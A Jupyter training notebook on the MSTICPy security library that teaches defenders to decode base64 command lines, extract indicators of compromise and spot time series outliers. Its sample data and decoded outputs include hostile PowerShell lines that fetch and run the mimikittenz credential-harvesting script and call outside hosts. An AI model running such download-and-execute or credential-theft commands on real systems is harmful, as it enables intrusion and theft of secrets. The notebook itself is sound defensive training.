## MSTICPy and Notebooks in InfoSec

---

<h1 style="border: solid; padding:5pt; color:black; background-color:#909090">Session 6 - Data analysis</h1>

---

## What this session covers:

* Data Analysis capabilities in msticpy
* Base 64 decoding
* IoC Extraction
* Outlier detection using Time Series Analysis


## Prerequisites
- Python >= 3.8 Environment
- Jupyter installed
- MSTICPy installed

## Recommended
- VS Code


---

# <a style="border: solid; padding:5pt; color:black; background-color:#909090">Data Analysis capabilities in msticpy</a>

---

MSTICPy has several generic analysis and transformation functions. Some examples of transforms are:
- Process tree building
- Decoding encoded and compressed data
- IoC/observable extraction from data
- Time series analysis
- Syslog parsing

You can read more about these features in the MSTICPy documentation:
 - [Data Analysis](https://msticpy.readthedocs.io/en/latest/DataAnalysis.html)
 - [Process Trees](https://msticpy.readthedocs.io/en/latest/visualization/ProcessTree.html)

---

# <a style="border: solid; padding:5pt; color:black; background-color:#909090">Base 64 decoding using msticpy</a>

---

Defenders often need to bulk-analyze process execution command-line logs that contain base64-encoded strings, decoding them to check for malicious activity.
This msticpy module lets you extract and decode base64-encoded content from a string or from a column of a pandas DataFrame.

For more details, see
[Base64 Decoding and Unpacking](https://msticpy.readthedocs.io/en/latest/data_analysis/Base64Unpack.html)

In [None]:
# %env MSTICPYCONFIG=./msticpyconfig.yaml
import pandas as pd
import msticpy as mp

mp.init_notebook()
pd.set_option('display.max_colwidth', 200)

To find the module path, you can use the search feature as shown below.

In [2]:
mp.search('base64')

Module,Help
msticpy.transform.base64unpack,msticpy.transform.base64unpack


Once you have identified the module path, you can use the module on either an input string or a column of a pandas DataFrame.

Here is an example PowerShell command string with base64-encoded data. You can paste it as the input in the next step.

`powershell -enc SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcHV0dGVycGFuZGEvbWltaWtpdHRlbnovbWFzdGVyL0ludm9rZS1taW1pa2l0dGVuei5wczEnKTsgSW52b2tlLW1pbWlraXR0ZW56Cg==`

In [3]:
cmdline = mp.nbwidgets.GetText(prompt='Enter a commandline with powershell base64 encoded', auto_display=True);

Text(value='', description='Enter a commandline with powershell base64 encoded', layout=Layout(width='50%'), s…

To decode, use the `unpack` function in the `base64unpack` transform module.
It returns the input string with the decoded content marked up, together with a DataFrame holding the following information for each decoded segment:
- decoded string (if decodable to utf-8 or utf-16)
- hashes of the decoded segment (MD5, SHA1, SHA256)
- string of printable byte values (e.g. for submission to a disassembler)
- the detected decoded file type (limited)
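
To make the fields above more concrete, here is a minimal standard-library sketch of the same idea. It is not MSTICPy's implementation: the function name `decode_b64_segments`, the regular expression, and the 20-character threshold are all assumptions chosen for illustration, and it does not handle nested or compressed content or file type detection.

```python
import base64
import hashlib
import re

# Runs of 20+ base64 characters plus optional padding. The length threshold
# is an arbitrary choice for this sketch, not a value taken from MSTICPy.
B64_PATTERN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decode_b64_segments(text):
    """Describe each base64 segment in text that decodes cleanly."""
    results = []
    for match in B64_PATTERN.finditer(text):
        segment = match.group(0)
        try:
            raw = base64.b64decode(segment, validate=True)
        except ValueError:  # binascii.Error is a subclass of ValueError
            continue
        # Heuristic: NUL bytes suggest UTF-16 (PowerShell's usual encoding).
        if b"\x00" in raw:
            encodings = ("utf-16-le", "utf-8")
        else:
            encodings = ("utf-8", "utf-16-le")
        decoded = None
        for encoding in encodings:
            try:
                decoded = raw.decode(encoding)
                break
            except UnicodeDecodeError:
                continue
        results.append(
            {
                "original_string": segment,
                "decoded_string": decoded,  # None if neither encoding fits
                "md5": hashlib.md5(raw).hexdigest(),
                "sha1": hashlib.sha1(raw).hexdigest(),
                "sha256": hashlib.sha256(raw).hexdigest(),
                "printable_bytes": " ".join(f"{byte:02x}" for byte in raw),
            }
        )
    return results


# Build a sample command line instead of pasting an encoded blob by hand.
payload = "Invoke-WebRequest -Uri http://example.test/a"
encoded = base64.b64encode(payload.encode("utf-8")).decode("ascii")
segments = decode_b64_segments(f"powershell -enc {encoded}")
print(segments[0]["decoded_string"])
```

The hashes are computed over the decoded bytes rather than the encoded text, which is what you would normally submit to a reputation service.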

In [6]:
# Decode the string
base64_dec_str = mp.transform.base64unpack.unpack(input_string=cmdline.value)

# Print decoded string
display(base64_dec_str[0])

"powershell -enc <decoded type='string' name='[None]' index='1' depth='1'>IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1'); Invoke-mimikittenz\n</decoded>"

In [7]:
# Print decoded string
display(base64_dec_str[1]['decoded_string'][0])

"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1'); Invoke-mimikittenz\n"

## <a style="border: solid; padding:5pt; color:black; background-color:#309030">Task 1 - Base 64 decoding using dataframe as input</a>

Perform base 64 decoding on the process data loaded in the cell below (`process_enc_logs`).
1. Choose the column containing the PowerShell base64 command-line logs.
2. Use Python help on `process_enc_logs.mp.b64extract` or `mp.transform.base64unpack.unpack_df`
   to find the correct parameters, such as the input data and column name.
3. Finally, display the results.

<br>
<details>
<summary>Hints...</summary>
<li>Use the cell below to identify the columns containing powershell base64 encoded logs.</li>
<li>Use the <code>data</code> and <code>column</code> parameters to specify the input DataFrame and the column containing the PowerShell command line.</li>
<li>The final command to decode should look like one of the following.

<pre>
    # using the pandas msticpy accessor
    process_enc_logs.mp.b64extract(column='CommandLine')
</pre>

<pre>
    # using the standalone function
    mp.transform.base64unpack.unpack_df(data=process_enc_logs, column='CommandLine')
</pre>
</li>
<ul>
</ul>
</details>

In [9]:
# Load test data
process_logs = pd.read_pickle('./data/processes_on_host.pkl')
# Filter the records with powershell base 64 encoded data
process_enc_logs = process_logs[process_logs['CommandLine'].str.contains("-enc")]
process_enc_logs

Unnamed: 0,TenantId,Account,EventID,TimeGenerated,Computer,SubjectUserSid,SubjectUserName,SubjectDomainName,SubjectLogonId,NewProcessId,NewProcessName,TokenElevationType,ProcessId,CommandLine,ParentProcessName,TargetLogonId,SourceComputerId,TimeCreatedUtc
968,52b1ab41-869e-4138-9e40-2a4457f09bf0,MSTICAlertsWin1\MSTICAdmin,4688,2019-02-09 23:26:48.107,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xab5a5ac,0x1260,C:\W!ndows\System32\powershell.exe,%%1936,0x1684,.\powershell -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdldC1Qcm9jZXNzOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpIGh0dHA6Ly93aDQwMWsub3JnL2dldHBzIg==,C:\Windows\System32\cmd.exe,0x0,263a788b-6526-4cdc-8ed9-d79402fe4aa0,2019-02-09 23:26:48.107
7452,52b1ab41-869e-4138-9e40-2a4457f09bf0,MSTICAlertsWin1\MSTICAdmin,4688,2019-02-13 22:03:42.860,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0x1e821b5,0x61e0,C:\W!ndows\System32\powershell.exe,%%1936,0x7b20,.\powershell -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdldC1Qcm9jZXNzOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpIGh0dHA6Ly93aDQwMWsub3JnL2dldHBzIg==,C:\Windows\System32\cmd.exe,0x0,263a788b-6526-4cdc-8ed9-d79402fe4aa0,2019-02-13 22:03:42.860


In [10]:
# specify the data and column parameters
dec_df = mp.transform.base64unpack.unpack_df(data=process_enc_logs, column='CommandLine')

# display dataframe
display(dec_df)

Unnamed: 0,reference,original_string,file_name,file_type,input_bytes,decoded_string,encoding_type,file_hashes,md5,sha1,sha256,printable_bytes,src_index,CommandLine,full_decoded_string
0,"(, 1., 1)",LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdldC1Qcm9jZXNzOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpIGh0dHA6Ly93aDQwMWsub3JnL2dldHBzIg==,unknown,,"b'-Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps""'","-Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps""",utf-8,"{'md5': '65716544c3db642171b7597cd3deca2b', 'sha1': '8aa4c81d51732addabcaa5d8f121c79b0923189f', 'sha256': '828cce6aec56c6cc50b35041381f7d11a8d9c3cd0893625a45ed611875910fa8'}",65716544c3db642171b7597cd3deca2b,8aa4c81d51732addabcaa5d8f121c79b0923189f,828cce6aec56c6cc50b35041381f7d11a8d9c3cd0893625a45ed611875910fa8,2d 4e 6f 6e 69 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 70 72 6f 66 69 6c 65 20 2d 43 6f 6d 6d 61 6e 64 20 22 49 6e 76 6f 6b 65 2d 45 78 70 72 65 73 73 69 6f 6e 20 47 65 74 2d 50 72 6f 63 65 73 7...,968,.\powershell -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdldC1Qcm9jZXNzOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpIGh0dHA6Ly93aDQwMWsub3JnL2dldHBzIg==,".\powershell -enc <decoded type='string' name='[None]' index='1' depth='1'>-Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps""</dec..."
1,"(, 1., 1)",LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdldC1Qcm9jZXNzOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpIGh0dHA6Ly93aDQwMWsub3JnL2dldHBzIg==,unknown,,"b'-Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps""'","-Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps""",utf-8,"{'md5': '65716544c3db642171b7597cd3deca2b', 'sha1': '8aa4c81d51732addabcaa5d8f121c79b0923189f', 'sha256': '828cce6aec56c6cc50b35041381f7d11a8d9c3cd0893625a45ed611875910fa8'}",65716544c3db642171b7597cd3deca2b,8aa4c81d51732addabcaa5d8f121c79b0923189f,828cce6aec56c6cc50b35041381f7d11a8d9c3cd0893625a45ed611875910fa8,2d 4e 6f 6e 69 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 70 72 6f 66 69 6c 65 20 2d 43 6f 6d 6d 61 6e 64 20 22 49 6e 76 6f 6b 65 2d 45 78 70 72 65 73 73 69 6f 6e 20 47 65 74 2d 50 72 6f 63 65 73 7...,7452,.\powershell -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdldC1Qcm9jZXNzOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpIGh0dHA6Ly93aDQwMWsub3JnL2dldHBzIg==,".\powershell -enc <decoded type='string' name='[None]' index='1' depth='1'>-Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps""</dec..."


---

# <a style="border: solid; padding:5pt; color:black; background-color:#909090">IoC extraction using msticpy</a>

---

This module lets you extract IoC patterns from a string or a DataFrame. It helps defenders pull out IoCs quickly and carry out follow-up activities on them.

For more details, see [IoC Extraction](https://msticpy.readthedocs.io/en/latest/data_analysis/IoCExtract.html)

You can use this module in a similar fashion, either by providing an input string or by passing a DataFrame with multiple logs containing IoCs.

Enter sample command line in the next cell to see how it works. 
`netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\bzzzzzz.txt`

In [11]:
# netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\bzzzzzz.txt
cmdline = mp.nbwidgets.GetText(prompt='Enter a commandline to extract IoCs', auto_display=True);

Text(value='', description='Enter a commandline to extract IoCs', layout=Layout(width='50%'), style=TextStyle(…

Use the `extract` method of the `IoCExtract` class and pass it the input string.

In [12]:
# Find the module path
mp.search('ioc')

Module,Help
msticpy.transform.iocextract,msticpy.transform.iocextract


In [13]:
ioc_extractor = mp.transform.IoCExtract()

# any IoCs in the string?
iocs_found = ioc_extractor.extract(cmdline.value)

if iocs_found:
    print('\nPotential IoCs found in alert process:')
    display(iocs_found)


Potential IoCs found in alert process:


defaultdict(set,
            {'ipv4': {'1.2.3.4'},
             'windows_path': {'C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\bzzzzzz.txt'}})
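
As a rough illustration of how pattern-based IoC extraction works, the sketch below applies a few regular expressions to a string and groups the matches by type. The patterns and the `extract_iocs` helper are simplified assumptions written for this example; they are not the patterns MSTICPy ships, which cover more IoC types and more edge cases.

```python
import re
from collections import defaultdict

# Deliberately simplified patterns, written for this sketch only.
IOC_PATTERNS = {
    "ipv4": re.compile(
        r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
    ),
    "url": re.compile(r"\bhttps?://[^\s\"'<>]+", re.IGNORECASE),
    "windows_path": re.compile(r"\b[A-Za-z]:\\[^\s\"'<>]+"),
}


def extract_iocs(text):
    """Return a mapping of IoC type to the set of matches found in text."""
    found = defaultdict(set)
    for ioc_type, pattern in IOC_PATTERNS.items():
        for match in pattern.finditer(text):
            found[ioc_type].add(match.group(0))
    return found


sample = (
    r"netsh start capture=yes IPv4.Address=1.2.3.4 "
    r"tracefile=C:\Users\user\AppData\Local\Temp\bzzzzzz.txt"
)
iocs = extract_iocs(sample)
print(dict(iocs))
```

Using a set per IoC type removes duplicates, which mirrors the `defaultdict(set, ...)` shape of the output shown above.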

## <a style="border: solid; padding:5pt; color:black; background-color:#309030">Task 2 - Extract IoCs from log dataset</a>

Perform IoC extraction on the data loaded in the previous task (`process_logs`, or the filtered `process_enc_logs`).
1. Choose the columns containing command-line logs that may hold IoCs to extract.
2. Use either of these (use Python help to find the correct parameters, such as the input data and column name):
   - the DataFrame accessor function `process_enc_logs.mp.ioc_extract()`
   - the `extract` method of the `mp.transform.IoCExtract` class
3. Finally, display the results.


<br>
<details>
<summary>Hints...</summary>
<li>Use the cell below to identify the columns containing command-line logs that may hold IoCs.</li>
<li>Use the <code>data</code> and <code>columns</code> parameters to specify the input DataFrame and the columns containing the command line.</li>
<li>Use the DataFrame accessor
<pre>
    process_logs.mp.ioc_extract(columns='CommandLine')
</pre>
</li>
<li>Or use the IoCExtract class method
<pre>
    ioc_extractor.extract(data=process_enc_logs, columns=['CommandLine'])
</pre>
</li>
<ul>
</ul>
</details>


In [14]:
ioc_df = ioc_extractor.extract(data=process_logs, columns=['CommandLine'])

if len(ioc_df):
    display(HTML("<h3>IoC patterns found in process tree.</h3>"))
    display(ioc_df[ioc_df['IoCType']=='url'])

Unnamed: 0,IoCType,Observable,SourceIndex,Input
384,url,http://wh401k.org/getps,967,".\powershell -Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps"""
678,url,http://www.401k.com/upload?pass=34592389,6091,".\regsvr32 /u /s c:\windows\fonts\csrss.exe ""http://www.401k.com/upload?pass=34592389"" post"
984,url,http://wh401k.org/getps,7451,".\powershell -Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps"""
2226,url,https://clients2.google.com/cr/report,9158,"""C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\Installer\setup.exe"" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\..."
2229,url,https://clients2.google.com/cr/report,9160,C:\Windows\TEMP\CR_42BC8.tmp\setup.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr...


In [15]:
ioc_df = process_logs.mp.ioc_extract(columns='CommandLine')

if len(ioc_df):
    display(HTML("<h3>IoC patterns found in process tree.</h3>"))
    display(ioc_df[ioc_df['IoCType']=='ipv4'])

Unnamed: 0,IoCType,Observable,SourceIndex,Input
1,ipv4,127.0.0.1,5,ping 127.0.0.1 -n 15
2,ipv4,127.0.0.1,7,ping 127.0.0.1 -n 15
3,ipv4,127.0.0.1,9,ping 127.0.0.1 -n 15
4,ipv4,127.0.0.1,11,ping 127.0.0.1 -n 15
5,ipv4,127.0.0.1,13,ping 127.0.0.1 -n 15
...,...,...,...,...
2543,ipv4,127.0.0.1,9856,ping 127.0.0.1 -n 29
2544,ipv4,127.0.0.1,9858,ping 127.0.0.1 -n 29
2570,ipv4,127.0.0.1,9891,ping 127.0.0.1 -n 18
2571,ipv4,127.0.0.1,9895,ping 127.0.0.1 -n 10
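
Most of the IPv4 results above are loopback addresses from `ping` commands, which are rarely worth a follow-up lookup. One possible way to narrow the list, sketched here with Python's standard `ipaddress` module, is to keep only globally routable addresses. The `is_routable` helper and the sample list are hypothetical and not part of MSTICPy.

```python
import ipaddress


def is_routable(observable):
    """Return True for globally routable IP addresses, False otherwise."""
    try:
        return ipaddress.ip_address(observable).is_global
    except ValueError:
        # Not a valid IP address at all
        return False


# Hypothetical observables standing in for the Observable column
observables = ["127.0.0.1", "10.0.0.5", "8.8.8.8", "not-an-ip"]
external = [item for item in observables if is_routable(item)]
print(external)
```

With a DataFrame shaped like `ioc_df`, the same helper could be applied to the IPv4 rows with `ioc_df["Observable"].map(is_routable)` to build a boolean filter.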


---

# <a style="border: solid; padding:5pt; color:black; background-color:#909090">Time Series analysis using msticpy</a>

---

MSTICPy has functions to calculate and display time series decomposition results. These can be useful for spotting time-based anomalies in data that has a predictable seasonal pattern.

For more details, check the documentation:
[Time Series Analysis](https://msticpy.readthedocs.io/en/latest/visualization/TimeSeriesAnomalies.html)
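
To build some intuition for seasonal anomaly detection, the sketch below uses a much simpler stand-in than a full time series decomposition: it takes the median of each position in the cycle as the seasonal baseline and flags points whose residual is far from that baseline. It does not model a trend component, and the `seasonal_outliers` function and its threshold are assumptions made for this illustration, not MSTICPy's algorithm.

```python
from statistics import median


def seasonal_outliers(values, period=24, threshold=3.0):
    """Return indexes of points far from a per-phase median baseline.

    Expects at least one full cycle of data (len(values) >= period).
    """
    # Seasonal baseline: median of all points at the same position in the cycle.
    baseline = [median(values[phase::period]) for phase in range(period)]
    residuals = [value - baseline[i % period] for i, value in enumerate(values)]

    # Robust spread of the residuals: scaled median absolute deviation (MAD).
    center = median(residuals)
    scale = 1.4826 * median(abs(r - center) for r in residuals)

    outliers = []
    for i, residual in enumerate(residuals):
        deviation = abs(residual - center)
        # With zero spread (perfectly periodic data) any deviation stands out.
        if (scale == 0 and deviation > 0) or (
            scale > 0 and deviation / scale > threshold
        ):
            outliers.append(i)
    return outliers


# Synthetic data: a repeating 4-point cycle with one injected spike.
series = [10, 20, 30, 20] * 6
series[9] = 200
print(seasonal_outliers(series, period=4))
```

Medians are used instead of means so that the spike itself does not pull the baseline toward it.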

In [11]:
mp.search('timeseries')

Module,Help
msticpy.analysis.timeseries,msticpy.analysis.timeseries
msticpy.vis.timeseries,msticpy.vis.timeseries


MSTICPy has a number of built-in queries for Microsoft Sentinel to support time series analysis:

- MultiDataSource.get_timeseries_anomalies
- MultiDataSource.get_timeseries_data
- MultiDataSource.get_timeseries_decompose
- MultiDataSource.plot_timeseries_datawithbaseline
- MultiDataSource.plot_timeseries_scoreanomolies

To use these, you need to connect to a Microsoft Sentinel workspace:

`# Authentication
qry_prov = mp.QueryProvider("MSSentinel")
qry_prov.connect(mp.WorkspaceConfig(workspace="cybersecuritysoc"))`

The following example runs a query against the connected Sentinel workspace and retrieves the time series data.

```
# Specify start and end timestamps (start must be earlier than end)
start='2022-09-01 00:00:00.000000'
end='2022-10-01 00:00:00.000000'

# Execute the query by passing required and optional parameters
time_series_data = qry_prov.MultiDataSource.get_timeseries_data(
    start=start,
    end=end,
    table="CommonSecurityLog",
    timestampcolumn="TimeGenerated",
    aggregatecolumn="SentBytes",
    groupbycolumn="DeviceVendor",
    aggregatefunction="sum(SentBytes)",
    where_clause='| where DeviceVendor=="Fortinet"',
    add_query_items='| mv-expand TimeGenerated to typeof(datetime), SentBytes to typeof(long)',
)
# Display the output
time_series_data
```
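
Hand-typed timestamps are easy to get wrong, so it can help to derive the query window from a single end time. The sketch below does this with the standard `datetime` module. The `query_window` helper is hypothetical, and passing `datetime` objects (rather than strings) as `start` and `end` is an assumption you should check against the query help.

```python
from datetime import datetime, timedelta, timezone


def query_window(end, days):
    """Return (start, end) datetimes covering `days` days up to `end`."""
    if days <= 0:
        raise ValueError("days must be positive")
    return end - timedelta(days=days), end


# A 30-day window ending on 1 October 2022 (UTC)
start, end = query_window(datetime(2022, 10, 1, tzinfo=timezone.utc), days=30)
print(start.isoformat(), end.isoformat())
```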

## <a style="border: solid; padding:5pt; color:black; background-color:#309030">Task 3 - Find outliers using time series analysis on network data</a>

Perform time series analysis on the sample data loaded in the first cell below (`ts_df`).
1. Use Python help on `ts_df.mp_timeseries.analyze` to find the correct parameters, such as `data_column` and the seasonal parameters. If you do not know the seasonality, keep the defaults.
2. Finally, plot the results of the previous step using `ts_decomp_df.mp_timeseries.plot`.

<br>
<details>
<summary>Hints...</summary>
<li>Use the cell below to identify the columns containing time series numerical data.</li>
<li>The final command to run the time series analysis should look like:
<pre>
    ts_df.mp_timeseries.analyze(
        # time_column="TimeGenerated"  - if the DF is not indexed by timestamp
        data_column="TotalBytesSent",
        seasonal=7,
        period=24
    )
</pre>
</li>
<li>You can also plot the results and outliers using the command.
<pre>
    ts_decomp_df.mp_timeseries.plot(
        y="TotalBytesSent",
    );
</pre>
</li>
<ul>
</ul>
</details>

In [2]:
# Load test data
import pandas as pd
ts_df = pd.read_pickle('./data/timeseries.pkl')
ts_df

Unnamed: 0_level_0,TotalBytesSent
TimeGenerated,Unnamed: 1_level_1
2020-07-06 00:00:00+00:00,10823
2020-07-06 01:00:00+00:00,14821
2020-07-06 02:00:00+00:00,13532
2020-07-06 03:00:00+00:00,11947
2020-07-06 04:00:00+00:00,11193
...,...
2020-07-12 19:00:00+00:00,18166
2020-07-12 20:00:00+00:00,13830
2020-07-12 21:00:00+00:00,13350
2020-07-12 22:00:00+00:00,11842


In [3]:
# Load the time series module
from msticpy.analysis import timeseries

# analyze the time series data and find outliers
ts_decomp_df = ts_df.mp_timeseries.analyze(
    data_column="TotalBytesSent",
    seasonal=7,
    period=24
)

In [4]:
# plot the results retrieved from previous step.
ts_decomp_df.mp_timeseries.plot(
    y="TotalBytesSent",
);

---
# End of Session
